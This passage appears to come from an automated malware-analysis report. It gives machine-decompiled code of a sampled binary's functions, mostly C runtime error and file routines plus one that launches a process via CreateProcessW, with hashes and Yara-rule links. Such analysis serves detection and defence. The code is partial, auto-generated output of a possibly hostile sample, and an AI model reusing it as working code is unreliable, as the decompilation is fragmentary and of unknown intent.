				_t79 = __rsi;
				_t63 = __rbx;
				 *((long long*)(_t84 + 0x10)) = __rbx;
				 *((long long*)(_t84 + 0x18)) = __rsi;
				_t82 = _t84 - 0x3e0;
				_t85 = _t84 - 0x4e0;
				_t60 =  *0x67716000; // 0x9b7b11e8241
				_t61 = _t60 ^ _t85;
				 *(_t82 + 0x3d0) = _t61;
				_t55 = 0;
				_t5 = _t79 + 0x68; // 0x68
				_t43 = _t5;
				r8d = _t43;
				 *((long long*)(_t85 + 0x50)) = __rsi;
				 *(_t85 + 0x58) = _t61;
				 *(_t85 + 0x60) = _t61;
				E67709420(0, __ecx, 0, _t85 + 0x70, __rdx, __r8);
				_t89 = "\"";
				 *((long long*)(_t85 + 0x28)) = "\"";
				_t88 = L"%s%s%s";
				 *((long long*)(_t85 + 0x20)) = __rcx;
				 *((intOrPtr*)(_t85 + 0x70)) = _t43;
				E67707158(L"%s%s%s", "\"");
				 *((long long*)(_t85 + 0x48)) = _t85 + 0x50;
				 *((long long*)(_t85 + 0x40)) = _t85 + 0x70;
				 *((long long*)(_t85 + 0x38)) = __rsi;
				 *((long long*)(_t85 + 0x30)) = __rsi;
				_t74 = _t82 - 0x20;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t85 + 0x28)) = 0;
				 *((intOrPtr*)(_t85 + 0x20)) = 0;
				_t35 = CreateProcessW(_t91, _t75, _t81, ??, ??, ??, ??);
				r12d = GetLastError();
				memset(__edi, 0, 0x3e4 << 0);
				_t57 = __esp + 0xc;
				_t54 = __edi + 0x3e4;
				_t58 = _t35;
				if(_t35 == 0) {
					_t55 = 4;
				} else {
					r12d =  *(_t85 + 0x60);
				}
				CloseHandle();
				CloseHandle(??);
				E677060CC(_t55, r12d, _t54, _t57, _t58, _t63, _t74, _t88, _t89);
				return E67706F80(_t55,  *(_t82 + 0x3d0) ^ _t85);
			}

















                                                                                                                                                  0x67702634
                                                                                                                                                  0x67702634
                                                                                                                                                  0x67702634
                                                                                                                                                  0x67702639
                                                                                                                                                  0x67702642
                                                                                                                                                  0x6770264a
                                                                                                                                                  0x67702651
                                                                                                                                                  0x67702658
                                                                                                                                                  0x6770265b
                                                                                                                                                  0x67702664
                                                                                                                                                  0x67702669
                                                                                                                                                  0x67702669
                                                                                                                                                  0x67702673
                                                                                                                                                  0x67702676
                                                                                                                                                  0x6770267b
                                                                                                                                                  0x67702680
                                                                                                                                                  0x67702685
                                                                                                                                                  0x6770268a
                                                                                                                                                  0x67702691
                                                                                                                                                  0x67702696
                                                                                                                                                  0x677026a6
                                                                                                                                                  0x677026ab
                                                                                                                                                  0x677026af
                                                                                                                                                  0x677026be
                                                                                                                                                  0x677026c3
                                                                                                                                                  0x677026c8
                                                                                                                                                  0x677026cd
                                                                                                                                                  0x677026d2
                                                                                                                                                  0x677026d6
                                                                                                                                                  0x677026d9
                                                                                                                                                  0x677026de
                                                                                                                                                  0x677026e2
                                                                                                                                                  0x677026e6
                                                                                                                                                  0x677026f8
                                                                                                                                                  0x67702702
                                                                                                                                                  0x67702702
                                                                                                                                                  0x67702702
                                                                                                                                                  0x67702704
                                                                                                                                                  0x67702706
                                                                                                                                                  0x6770270f
                                                                                                                                                  0x67702708
                                                                                                                                                  0x67702708
                                                                                                                                                  0x67702708
                                                                                                                                                  0x67702719
                                                                                                                                                  0x67702724
                                                                                                                                                  0x6770272f
                                                                                                                                                  0x6770275a

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastProcess_vswprintf_s_lswprintf
                                                                                                                                                  • String ID: %s%s%s
                                                                                                                                                  • API String ID: 3771761966-3094730333
                                                                                                                                                  • Opcode ID: 757e551684780a6a2e53bf7129a056ba30c82368a703e0fe71e9582525907852
                                                                                                                                                  • Instruction ID: 1b864e74fd1271dba796a7cdb4ac811b48d11ad06b4f0077587dcd6fbdc82f84
                                                                                                                                                  • Opcode Fuzzy Hash: 757e551684780a6a2e53bf7129a056ba30c82368a703e0fe71e9582525907852
                                                                                                                                                  • Instruction Fuzzy Hash: DD317E72618B8086EB10CF65F84474EB3E9F788B88F944126EB8D47B18DF78C655CB40
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770E24C, Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                  			E6770E24C(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11, signed int _a8, long long _a16) {
				void* __rdi;
				void* __rsi;
				void* __r12;
				signed int _t16;
				signed int _t17;
				signed int _t24;
				signed int _t25;
				signed int _t32;
				signed int _t33;
				signed int _t34;
				signed int* _t38;
				signed long long _t42;
				void* _t47;
				signed long long _t57;

				_t37 = __rax;
				_t33 = __edi;
				_t32 = __edx;
				_a16 = __rbx;
				_a8 = __ecx;
				_t34 = r8d;
				if(__edi != 0xfffffffe) {
					if(__ecx < 0 || __edi >=  *0x677198e8) {
						L9:
						E6770853C(_t37);
						 *_t37 =  *_t37 & 0x00000000;
						E6770851C(_t37);
						 *_t37 = 9;
						_t16 = E67709254();
						goto L10;
					} else {
						_t57 = __ecx >> 5;
						_t24 = __ebx & 0x0000001f;
						_t42 = __ecx * 0x58;
						_t37 =  *((intOrPtr*)(0x67719900 + _t57 * 8));
						if(( *(_t37 + _t42 + 8) & 0x00000001) == 0) {
							goto L9;
						} else {
							E6770FB9C(_t24, __edi, _t42, __ecx, _t47, __rdx);
							_t38 =  *((intOrPtr*)(0x67719900 + _t57 * 8));
							if(( *(_t38 + _t42 + 8) & 0x00000001) == 0) {
								E6770851C(_t38);
								 *_t38 = 9;
								E6770853C(_t38);
								 *_t38 =  *_t38 & 0x00000000;
								_t25 = _t24 | 0xffffffff;
							} else {
								r8d = _t34;
								_t25 = E6770DAEC(_t24, _t33, _t32, _t34, _t38, _t42, __rdx, __r8, __r9, __r10, __r11);
							}
							E6770FC44();
							_t17 = _t25;
						}
					}
				} else {
					E6770853C(__rax);
					 *__rax =  *__rax & 0x00000000;
					_t16 = E6770851C(__rax);
					 *__rax = 9;
					L10:
					_t17 = _t16 | 0xffffffff;
				}
				return _t17;
			}

















                                                                                                                                                  0x6770e24c
                                                                                                                                                  0x6770e24c
                                                                                                                                                  0x6770e24c
                                                                                                                                                  0x6770e24c
                                                                                                                                                  0x6770e251
                                                                                                                                                  0x6770e261
                                                                                                                                                  0x6770e26d
                                                                                                                                                  0x6770e289
                                                                                                                                                  0x6770e2fe
                                                                                                                                                  0x6770e2fe
                                                                                                                                                  0x6770e303
                                                                                                                                                  0x6770e306
                                                                                                                                                  0x6770e30b
                                                                                                                                                  0x6770e311
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e293
                                                                                                                                                  0x6770e299
                                                                                                                                                  0x6770e2a4
                                                                                                                                                  0x6770e2a7
                                                                                                                                                  0x6770e2ab
                                                                                                                                                  0x6770e2b7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770e2b9
                                                                                                                                                  0x6770e2bb
                                                                                                                                                  0x6770e2c1
                                                                                                                                                  0x6770e2ca
                                                                                                                                                  0x6770e2dd
                                                                                                                                                  0x6770e2e2
                                                                                                                                                  0x6770e2e8
                                                                                                                                                  0x6770e2ed
                                                                                                                                                  0x6770e2f0
                                                                                                                                                  0x6770e2cc
                                                                                                                                                  0x6770e2cc
                                                                                                                                                  0x6770e2d9
                                                                                                                                                  0x6770e2d9
                                                                                                                                                  0x6770e2f5
                                                                                                                                                  0x6770e2fa
                                                                                                                                                  0x6770e2fa
                                                                                                                                                  0x6770e2b7
                                                                                                                                                  0x6770e26f
                                                                                                                                                  0x6770e26f
                                                                                                                                                  0x6770e274
                                                                                                                                                  0x6770e277
                                                                                                                                                  0x6770e27c
                                                                                                                                                  0x6770e316
                                                                                                                                                  0x6770e316
                                                                                                                                                  0x6770e316
                                                                                                                                                  0x6770e32a

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __doserrno_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 921712934-0
                                                                                                                                                  • Opcode ID: f8a93e26909bb760d88ebc4930d720fdf78adc07b3ab107fb39be37bae696434
                                                                                                                                                  • Instruction ID: 7c8aa96a0defdf544266109ac757ae0e2fb07a2aa4360ccbce162ded1e5bf48a
                                                                                                                                                  • Opcode Fuzzy Hash: f8a93e26909bb760d88ebc4930d720fdf78adc07b3ab107fb39be37bae696434
                                                                                                                                                  • Instruction Fuzzy Hash: 7B1136F2314A8445D7066F65DB4432D7AD1A78DBA9F090128DF24073A0CBB88C81CB22
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770DA08, Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E6770DA08(signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, signed int _a8, long long _a16) {
				void* __rdi;
				void* __rsi;
				void* __r12;
				void* _t16;
				signed int _t21;
				void* _t28;
				void* _t29;
				void* _t30;
				signed int* _t33;
				signed int* _t35;
				signed long long _t40;
				void* _t46;
				signed long long _t53;

				_t33 = __rax;
				_t29 = __edi;
				_t28 = __edx;
				_a16 = __rbx;
				_a8 = __ecx;
				_t30 = r8d;
				if(__edi != 0xfffffffe) {
					if(__ecx < 0 || __edi >=  *0x677198e8) {
						L9:
						E6770853C(_t33);
						 *_t33 =  *_t33 & 0x00000000;
						E6770851C(_t33);
						 *_t33 = 9;
						_t16 = E67709254();
						goto L10;
					} else {
						_t53 = __ecx >> 5;
						_t21 = __ebx & 0x0000001f;
						_t40 = __ecx * 0x58;
						_t33 =  *((intOrPtr*)(0x67719900 + _t53 * 8));
						if(( *(_t33 + _t40 + 8) & 0x00000001) == 0) {
							goto L9;
						} else {
							E6770FB9C(_t21, __edi, _t40, __ecx, _t46, __rdx);
							_t35 =  *((intOrPtr*)(0x67719900 + _t53 * 8));
							if(( *(_t35 + _t40 + 8) & 0x00000001) == 0) {
								E6770851C(_t35);
								 *_t35 = 9;
								_t16 = E6770853C(_t35);
								 *_t35 =  *_t35 & 0x00000000;
							} else {
								r8d = _t30;
								_t16 = E6770D970(_t21, _t29, _t28, _t35, _t40, __rdx);
							}
							E6770FC44();
						}
					}
				} else {
					E6770853C(__rax);
					 *__rax =  *__rax & 0x00000000;
					_t16 = E6770851C(__rax);
					 *__rax = 9;
					L10:
				}
				return _t16;
			}
















                                                                                                                                                  0x6770da08
                                                                                                                                                  0x6770da08
                                                                                                                                                  0x6770da08
                                                                                                                                                  0x6770da08
                                                                                                                                                  0x6770da0d
                                                                                                                                                  0x6770da1d
                                                                                                                                                  0x6770da29
                                                                                                                                                  0x6770da45
                                                                                                                                                  0x6770dabd
                                                                                                                                                  0x6770dabd
                                                                                                                                                  0x6770dac2
                                                                                                                                                  0x6770dac5
                                                                                                                                                  0x6770daca
                                                                                                                                                  0x6770dad0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770da4f
                                                                                                                                                  0x6770da55
                                                                                                                                                  0x6770da60
                                                                                                                                                  0x6770da63
                                                                                                                                                  0x6770da67
                                                                                                                                                  0x6770da73
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770da75
                                                                                                                                                  0x6770da77
                                                                                                                                                  0x6770da7d
                                                                                                                                                  0x6770da86
                                                                                                                                                  0x6770da9a
                                                                                                                                                  0x6770da9f
                                                                                                                                                  0x6770daa5
                                                                                                                                                  0x6770daaa
                                                                                                                                                  0x6770da88
                                                                                                                                                  0x6770da88
                                                                                                                                                  0x6770da90
                                                                                                                                                  0x6770da95
                                                                                                                                                  0x6770dab3
                                                                                                                                                  0x6770dab8
                                                                                                                                                  0x6770da73
                                                                                                                                                  0x6770da2b
                                                                                                                                                  0x6770da2b
                                                                                                                                                  0x6770da30
                                                                                                                                                  0x6770da33
                                                                                                                                                  0x6770da38
                                                                                                                                                  0x6770dad5
                                                                                                                                                  0x6770dad5
                                                                                                                                                  0x6770daea

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __doserrno_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 921712934-0
                                                                                                                                                  • Opcode ID: 18f75d70404430ccb54b85fffe87831568d4df834761e4d973db8025d549a8a3
                                                                                                                                                  • Instruction ID: 5fb744f3e8e7ae429f550ad2252e860aa600fa6396e47f143626d52c0ed6736a
                                                                                                                                                  • Opcode Fuzzy Hash: 18f75d70404430ccb54b85fffe87831568d4df834761e4d973db8025d549a8a3
                                                                                                                                                  • Instruction Fuzzy Hash: 731121F231838045DB065F25DA1432D7AA1A788BB9F1D4314CF390B3D0CB788C92CB2A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67710208, Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E67710208(signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int* __rax, long long __rbx, void* __rcx, signed int _a8, long long _a24) {
				void* __rdi;
				void* __rsi;
				void* __r12;
				signed int _t15;
				signed int _t16;
				signed int _t24;
				signed int _t25;
				void* _t32;
				void* _t33;
				signed int* _t37;
				signed long long _t41;
				signed long long _t46;

				_t36 = __rax;
				_t33 = __edi;
				_t32 = __edx;
				_a24 = __rbx;
				_a8 = __ecx;
				if(__edi != 0xfffffffe) {
					if(__ecx < 0 || __edi >=  *0x677198e8) {
						L13:
						E6770851C(_t36);
						 *_t36 = 9;
						_t15 = E67709254();
						goto L14;
					} else {
						_t46 = __ecx >> 5;
						_t24 = __ebx & 0x0000001f;
						_t41 = __ecx * 0x58;
						_t36 =  *((intOrPtr*)(0x67719900 + _t46 * 8));
						if(( *(_t36 + _t41 + 8) & 0x00000001) == 0) {
							goto L13;
						} else {
							E6770FB9C(_t24, __edi, _t41, __ecx, _t46, 0x67719900);
							_t37 =  *((intOrPtr*)(0x67719900 + _t46 * 8));
							if(( *(_t37 + _t41 + 8) & 0x00000001) == 0) {
								L11:
								E6770851C(_t37);
								 *_t37 = 9;
								_t25 = _t24 | 0xffffffff;
							} else {
								E6770FB28(_t33, _t32, _t37);
								if(FlushFileBuffers(??) != 0) {
									_t25 = 0;
								} else {
									_t25 = GetLastError();
								}
								if(_t25 != 0) {
									E6770853C(_t37);
									 *_t37 = _t25;
									goto L11;
								}
							}
							E6770FC44();
							_t16 = _t25;
						}
					}
				} else {
					_t15 = E6770851C(__rax);
					 *__rax = 9;
					L14:
					_t16 = _t15 | 0xffffffff;
				}
				return _t16;
			}















                                                                                                                                                  0x67710208
                                                                                                                                                  0x67710208
                                                                                                                                                  0x67710208
                                                                                                                                                  0x67710208
                                                                                                                                                  0x6771020d
                                                                                                                                                  0x6771021f
                                                                                                                                                  0x67710233
                                                                                                                                                  0x677102be
                                                                                                                                                  0x677102be
                                                                                                                                                  0x677102c3
                                                                                                                                                  0x677102c9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67710241
                                                                                                                                                  0x67710247
                                                                                                                                                  0x67710252
                                                                                                                                                  0x67710255
                                                                                                                                                  0x67710259
                                                                                                                                                  0x67710265
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67710267
                                                                                                                                                  0x67710269
                                                                                                                                                  0x6771026f
                                                                                                                                                  0x67710278
                                                                                                                                                  0x677102a5
                                                                                                                                                  0x677102a5
                                                                                                                                                  0x677102aa
                                                                                                                                                  0x677102b0
                                                                                                                                                  0x6771027a
                                                                                                                                                  0x6771027c
                                                                                                                                                  0x6771028c
                                                                                                                                                  0x67710298
                                                                                                                                                  0x6771028e
                                                                                                                                                  0x67710294
                                                                                                                                                  0x67710294
                                                                                                                                                  0x6771029c
                                                                                                                                                  0x6771029e
                                                                                                                                                  0x677102a3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677102a3
                                                                                                                                                  0x6771029c
                                                                                                                                                  0x677102b5
                                                                                                                                                  0x677102ba
                                                                                                                                                  0x677102ba
                                                                                                                                                  0x67710265
                                                                                                                                                  0x67710221
                                                                                                                                                  0x67710221
                                                                                                                                                  0x67710226
                                                                                                                                                  0x677102ce
                                                                                                                                                  0x677102ce
                                                                                                                                                  0x677102ce
                                                                                                                                                  0x677102de

                                                                                                                                                  APIs
                                                                                                                                                  • _errno.LIBCMT ref: 67710221
                                                                                                                                                  • FlushFileBuffers.KERNEL32(?,00000000,00000000,6770FE2E,?,?,00000001,6770FED7,?,?,?,?,?,6770E4D1), ref: 67710284
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,6770FE2E,?,?,00000001,6770FED7,?,?,?,?,?,6770E4D1), ref: 6771028E
                                                                                                                                                  • __doserrno.LIBCMT ref: 6771029E
                                                                                                                                                  • _errno.LIBCMT ref: 677102A5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$BuffersErrorFileFlushLast__doserrno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1845094721-0
                                                                                                                                                  • Opcode ID: e91d1a9757ec935fbd2d946015585a90d68977c713cf6a0ae89fc3fb9f2e3864
                                                                                                                                                  • Instruction ID: 68264b802de6f54395fed12e56481366afb286d33235db364fadb430c449bc19
                                                                                                                                                  • Opcode Fuzzy Hash: e91d1a9757ec935fbd2d946015585a90d68977c713cf6a0ae89fc3fb9f2e3864
                                                                                                                                                  • Instruction Fuzzy Hash: 6411387172C78045EB015FA5EB9432D3661AB9D7A4F5D4228DB290B395CF78C8A1CB05
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6771039C, Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                  			E6771039C(void* __ebx, signed int __ecx, void* __edx, signed int __edi, signed int* __rax, long long __rbx, void* __rcx, void* __rbp, signed int _a8, long long _a24) {
				void* __rdi;
				void* __rsi;
				void* __r12;
				signed int _t16;
				signed int _t17;
				void* _t29;
				signed int _t31;
				signed int _t32;
				signed int* _t36;
				signed long long _t42;
				signed long long _t44;

				_t35 = __rax;
				_t29 = __edx;
				_a24 = __rbx;
				_a8 = __ecx;
				_t38 = __ecx;
				if(__ebx != 0xfffffffe) {
					if(__ecx < 0 || __ebx >=  *0x677198e8) {
						L9:
						E6770853C(_t35);
						 *_t35 =  *_t35 & 0x00000000;
						E6770851C(_t35);
						 *_t35 = 9;
						_t16 = E67709254();
						goto L10;
					} else {
						_t44 = __ecx >> 5;
						_t31 = __edi & 0x0000001f;
						_t42 = __ecx * 0x58;
						_t35 =  *((intOrPtr*)(0x67719900 + _t44 * 8));
						if(( *(_t35 + _t42 + 8) & 0x00000001) == 0) {
							goto L9;
						} else {
							E6770FB9C(__ebx, __ebx, __ecx, _t42, _t44, 0x67719900);
							_t36 =  *((intOrPtr*)(0x67719900 + _t44 * 8));
							if(( *(_t36 + _t42 + 8) & 0x00000001) == 0) {
								E6770851C(_t36);
								 *_t36 = 9;
								_t32 = _t31 | 0xffffffff;
							} else {
								_t32 = E677102E0(__ebx, _t29, _t31, _t36, _t38, __rbp);
							}
							E6770FC44();
							_t17 = _t32;
						}
					}
				} else {
					E6770853C(__rax);
					 *__rax =  *__rax & 0x00000000;
					_t16 = E6770851C(__rax);
					 *__rax = 9;
					L10:
					_t17 = _t16 | 0xffffffff;
				}
				return _t17;
			}














                                                                                                                                                  0x6771039c
                                                                                                                                                  0x6771039c
                                                                                                                                                  0x6771039c
                                                                                                                                                  0x677103a1
                                                                                                                                                  0x677103ad
                                                                                                                                                  0x677103b3
                                                                                                                                                  0x677103cf
                                                                                                                                                  0x67710436
                                                                                                                                                  0x67710436
                                                                                                                                                  0x6771043b
                                                                                                                                                  0x6771043e
                                                                                                                                                  0x67710443
                                                                                                                                                  0x67710449
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677103d9
                                                                                                                                                  0x677103df
                                                                                                                                                  0x677103ea
                                                                                                                                                  0x677103ed
                                                                                                                                                  0x677103f1
                                                                                                                                                  0x677103fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677103ff
                                                                                                                                                  0x67710401
                                                                                                                                                  0x67710407
                                                                                                                                                  0x67710410
                                                                                                                                                  0x6771041d
                                                                                                                                                  0x67710422
                                                                                                                                                  0x67710428
                                                                                                                                                  0x67710412
                                                                                                                                                  0x67710419
                                                                                                                                                  0x67710419
                                                                                                                                                  0x6771042d
                                                                                                                                                  0x67710432
                                                                                                                                                  0x67710432
                                                                                                                                                  0x677103fd
                                                                                                                                                  0x677103b5
                                                                                                                                                  0x677103b5
                                                                                                                                                  0x677103ba
                                                                                                                                                  0x677103bd
                                                                                                                                                  0x677103c2
                                                                                                                                                  0x6771044e
                                                                                                                                                  0x6771044e
                                                                                                                                                  0x6771044e
                                                                                                                                                  0x6771045e

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __doserrno_close_nolock_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 186997739-0
                                                                                                                                                  • Opcode ID: eef041b6966af186739a083d3c6d25d603e16a61e2d4c8d1dd3baf33185615e4
                                                                                                                                                  • Instruction ID: 7e4d0f0e79db931c97257fc1a52d1992d09cf34dabac9ebd7ca8bbae7ef87597
                                                                                                                                                  • Opcode Fuzzy Hash: eef041b6966af186739a083d3c6d25d603e16a61e2d4c8d1dd3baf33185615e4
                                                                                                                                                  • Instruction Fuzzy Hash: 2011237276828042D7056F25EBC831D76A1AB897A4F5D4638DE290B3D1CB78C891CB16
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677095A8, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E677095A8(void* __edx, void* __eflags, signed int __rbx, intOrPtr* __rcx, signed int __rdi, signed int __rsi, void* __r8, intOrPtr* __r9) {
				void* _t13;
				void* _t14;
				void* _t15;
				signed int* _t23;
				void* _t33;
				signed int _t35;
				intOrPtr* _t36;
				signed int* _t38;

				_t23 = _t38;
				_t23[2] = __rbx;
				_t23[4] = _t35;
				_t23[6] = __rsi;
				_t23[8] = __rdi;
				_t25 = __r9;
				_t33 = __r8;
				_t19 = __edx;
				_t36 = __rcx;
				_t13 = E6770851C(_t23);
				r12d =  *_t23;
				if(( *(__r8 + 0x18) & 0x00000040) == 0 ||  *((long long*)(__r8 + 0x10)) != 0) {
					_t14 = E6770851C(_t23);
					 *_t23 =  *_t23 & 0x00000000;
					while(_t19 > 0) {
						_t19 = _t19 - 1;
						_t14 = E6770950C(_t14,  *_t36, _t33, _t25);
						_t36 = _t36 + 1;
						if( *_t25 != 0xffffffff) {
							continue;
						}
						_t15 = E6770851C(_t23);
						if( *_t23 != 0x2a) {
							break;
						}
						_t14 = E6770950C(_t15, 0x3f, _t33, _t25);
					}
					_t13 = E6770851C(_t23);
					if( *_t23 == 0) {
						_t13 = E6770851C(_t23);
						 *_t23 = r12d;
					}
					goto L10;
				} else {
					 *__r9 =  *__r9 + __edx;
					L10:
					return _t13;
				}
			}











                                                                                                                                                  0x677095a8
                                                                                                                                                  0x677095ab
                                                                                                                                                  0x677095af
                                                                                                                                                  0x677095b3
                                                                                                                                                  0x677095b7
                                                                                                                                                  0x677095c1
                                                                                                                                                  0x677095c4
                                                                                                                                                  0x677095c7
                                                                                                                                                  0x677095c9
                                                                                                                                                  0x677095cc
                                                                                                                                                  0x677095d5
                                                                                                                                                  0x677095d8
                                                                                                                                                  0x677095e5
                                                                                                                                                  0x677095ea
                                                                                                                                                  0x6770961e
                                                                                                                                                  0x677095f8
                                                                                                                                                  0x677095fa
                                                                                                                                                  0x677095ff
                                                                                                                                                  0x67709605
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709607
                                                                                                                                                  0x6770960f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709619
                                                                                                                                                  0x67709619
                                                                                                                                                  0x67709622
                                                                                                                                                  0x6770962a
                                                                                                                                                  0x6770962c
                                                                                                                                                  0x67709631
                                                                                                                                                  0x67709631
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677095e1
                                                                                                                                                  0x677095e1
                                                                                                                                                  0x67709634
                                                                                                                                                  0x6770964e
                                                                                                                                                  0x6770964e

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$write_char
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1772936973-0
                                                                                                                                                  • Opcode ID: 0b27436cfa72d31906cd29247da53f6419ccaa2e847435220fb6228afe7b1180
                                                                                                                                                  • Instruction ID: 92223101e61899c73c2affee2a91e1c1f6a03396e7c0a2cbd7b2bf9f5c08339c
                                                                                                                                                  • Opcode Fuzzy Hash: 0b27436cfa72d31906cd29247da53f6419ccaa2e847435220fb6228afe7b1180
                                                                                                                                                  • Instruction Fuzzy Hash: 5A1157B2604B808ADB115F62A60430977F0F7ADF98F599061DF9807785CB39C881CF52
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770B2C4, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6770B2C4(void* __edx, void* __eflags, signed int __rbx, void* __rcx, signed int __rdi, signed int __rsi, void* __r8, intOrPtr* __r9) {
				void* _t13;
				void* _t14;
				void* _t15;
				signed int* _t23;
				void* _t33;
				signed int _t35;
				void* _t36;
				signed int* _t38;

				_t23 = _t38;
				_t23[2] = __rbx;
				_t23[4] = _t35;
				_t23[6] = __rsi;
				_t23[8] = __rdi;
				_t25 = __r9;
				_t33 = __r8;
				_t19 = __edx;
